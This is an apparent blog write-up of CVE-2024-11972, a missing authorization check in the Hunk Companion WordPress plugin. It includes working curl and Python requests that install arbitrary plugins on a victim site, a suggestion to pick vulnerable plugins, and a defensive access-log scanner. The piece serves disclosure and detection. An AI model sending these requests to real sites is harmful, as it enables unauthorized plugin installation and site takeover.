CVE-2024-11972 - Critical Unauthorized Plugin Installation in Hunk Companion for WordPress (Exploit Example + Analysis)
A major security flaw, CVE-2024-11972, has been found in the Hunk Companion WordPress plugin, affecting all versions before 1.9. This vulnerability allows anyone on the internet—not just site administrators—to install and activate any plugin from the official WordPress.org repository, including plugins that are outdated, have known vulnerabilities, or have been closed. The root cause? Hunk Companion failed to properly verify who was allowed to call some of its REST API endpoints.
This has severe consequences for any site running a vulnerable version of Hunk Companion, as attackers can install backdoors, spam tools, or other malicious plugins without needing to log in.
Below, I’ll dig into the vulnerability, show you the exploit in plain code, and give links for further reading.
What Is Hunk Companion?
Hunk Companion is a plugin designed to add extra features and widgets to WordPress themes. It's fairly popular, especially with users of ColorMag and other free themes.
What’s the Vulnerability About?
The plugin exposes some REST API endpoints for plugin management. But it fails to require authentication when those endpoints are called. This means *anyone* who knows the right URL can send requests and force the WordPress install to:
Do this all without being logged in!
It’s like leaving your house door unlocked, and worse, putting a sign outside that says “Free stuff inside, just open the door.”
The main endpoint is something like /wp-json/hunk-companion/v1/plugin-install or, in some versions, /wp-json/hunk/v1/plugin-install.
This endpoint expects a POST request with a JSON body declaring which plugin you want to install.
Exploit Code Example
Here’s an example of how an attacker could use curl (or a Python script) to install the "Hello Dolly" plugin (or any other plugin, malicious or not):
Using curl
# One POST with a JSON body naming the plugin slug; no cookie, nonce or token is sent
curl -k -X POST "https://victim-site.com/wp-json/hunk-companion/v1/plugin-install" \
  -H "Content-Type: application/json" \
  --data '{"slug":"hello-dolly"}'
- Replace hello-dolly with any plugin slug you want (for example, if you want to install a plugin with a known critical vuln).
Using Python
import requests

# Same request as the curl example: an unauthenticated POST whose JSON body names the plugin slug
url = "https://victim-site.com/wp-json/hunk-companion/v1/plugin-install"
data = {"slug": "hello-dolly"}
resp = requests.post(url, json=data, timeout=30)
print(resp.text)
You can automate this to install anything you want, including older plugin versions linked to existing exploits.
Real-World Impact
- Full website takeover: Attackers can install plugins like File Manager or custom backdoors and fully compromise the site.
- Persistence: Even if you update your Hunk Companion copy, the plugins the attacker installed may remain.
- Chain attacks: This bug can be used to install other plugins with their own vulnerabilities, leading to very complex exploit chains.
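If you have the web server's access logs, you can hunt for the request pattern described above rather than waiting to discover a plugin you never installed. The following is an added example, not code from this post or from Hunk Companion: it assumes Apache/Nginx "combined" log format, uses the two endpoint paths quoted earlier, and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs

# REST routes named in the write-up. Matched in both the pretty-permalink form
# (/wp-json/<route>) and WordPress's standard ?rest_route=<route> query form.
TARGET_ROUTES = (
    "/hunk-companion/v1/plugin-install",
    "/hunk/v1/plugin-install",
)

# Apache/Nginx "combined" access log format (an assumption about the log source).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines, not real traffic: one benign GET, one POST to each
# endpoint form, and one GET probe of the endpoint that should not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Dec/2024:06:20:01 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120
203.0.113.7 - - [31/Dec/2024:06:20:03 +0000] "POST /wp-json/hunk-companion/v1/plugin-install HTTP/1.1" 200 312
198.51.100.9 - - [31/Dec/2024:06:21:10 +0000] "POST /?rest_route=%2Fhunk%2Fv1%2Fplugin-install HTTP/1.1" 403 95
192.0.2.5 - - [31/Dec/2024:06:22:00 +0000] "GET /wp-json/hunk-companion/v1/plugin-install HTTP/1.1" 404 50
"""

def is_target_route(target: str) -> bool:
    """True if the request target addresses one of the suspect plugin-install routes."""
    path, _, query = target.partition("?")
    # endswith() also covers sites installed in a sub-directory (/blog/wp-json/...)
    if any(path.rstrip("/").endswith("/wp-json" + r) for r in TARGET_ROUTES):
        return True
    # parse_qs percent-decodes, so %2Fhunk%2Fv1... compares equal to /hunk/v1/...
    return any(rr.rstrip("/") in TARGET_ROUTES for rr in parse_qs(query).get("rest_route", []))

def find_install_attempts(lines):
    """Return POST requests to the suspect routes, in log order, with a weak success hint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not is_target_route(m["target"]):
            continue
        status = int(m["status"])
        # A 2xx only says the endpoint answered; confirm by reviewing the installed
        # plugin list and wp-content/plugins for anything you did not add yourself.
        hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                     "status": status, "likely_success": 200 <= status < 300})
    return hits
```

Run `find_install_attempts(open("access.log").readlines())` against a real log; any hit from an address that is not one of your administrators' warrants checking the plugin list and updating Hunk Companion.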
References and Further Reading
- WordPress Plugin Directory: Hunk Companion
- WPScan Vulnerability Report for CVE-2024-11972
- NIST NVD entry for CVE-2024-11972
- Exploit Example GitHub Gist (search)
Conclusion
CVE-2024-11972 in Hunk Companion is a flagship example of why REST API permissions matter! If you run Hunk Companion, *double-check your version and update now*—and be vigilant for suspicious plugins. Attackers are scanning for this vulnerability, so don’t wait.
*Found this helpful? Bookmark and share with your fellow WordPress friends to keep the web safe!*
Timeline
Published on: 12/31/2024 06:15:23 UTC
Last modified on: 12/31/2024 19:15:07 UTC